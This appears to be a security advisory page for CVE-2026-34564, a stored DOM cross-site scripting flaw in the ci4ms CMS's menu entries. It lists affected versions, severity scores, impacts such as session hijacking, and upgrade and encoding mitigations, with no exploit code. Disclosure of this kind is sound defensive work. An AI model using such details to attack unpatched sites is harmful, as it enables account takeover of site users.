Platform
php
Component
ci4-cms-erp/ci4ms
Fixed in
0.31.1
0.31.0.0
CVE-2026-34564 describes a stored DOM Cross-Site Scripting (XSS) vulnerability within the ci4-cms-erp/ci4ms CMS. This vulnerability allows attackers to inject malicious scripts that are persistently stored and rendered, potentially compromising administrative interfaces and public-facing navigation menus. The vulnerability affects versions of ci4-cms-erp/ci4ms up to and including 0.28.6.0, with a fix available in version 0.31.0.0.
The impact of this XSS vulnerability is significant. An attacker can inject arbitrary JavaScript code that will be executed in the context of a user's browser when they view a page containing the malicious script. This can lead to session hijacking, account takeover, defacement of the website, or redirection to malicious sites. Because the payload is stored persistently, it affects all users who view the affected menu entries, amplifying the potential impact. The stored nature of the XSS makes it particularly dangerous as it can remain undetected for extended periods, continuously compromising users.
CVE-2026-34564 was publicly disclosed on 2026-04-01. The vulnerability's severity is rated as CRITICAL (CVSS 9.1). No public proof-of-concept (PoC) code has been identified at the time of writing, but the relatively high CVSS score and the ease of exploitation inherent in stored XSS vulnerabilities suggest a potential for active exploitation. It is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.04% (13% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-34564 is to upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. If upgrading immediately is not feasible, consider implementing temporary workarounds. Input validation and output encoding should be applied to all user-supplied data, especially when handling page titles and descriptions used in menu entries. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly scan the application for XSS vulnerabilities using automated tools.
Update ci4ms to version 0.31.0.0 or higher. This version fixes the stored XSS vulnerability in menu management, preventing malicious code execution in user browsers.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-34564 is a critical stored DOM XSS vulnerability in ci4-cms-erp/ci4ms versions up to 0.28.6.0, allowing attackers to inject malicious scripts via menu entries.
Yes, if you are using ci4-cms-erp/ci4ms version 0.28.6.0 or earlier, you are vulnerable to this XSS attack.
Upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. As a temporary workaround, implement strict input validation and output encoding.
While no public exploits are currently known, the high CVSS score and ease of exploitation suggest a potential for active exploitation.
Refer to the official ci4-cms-erp project repository or website for the latest security advisories and updates.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.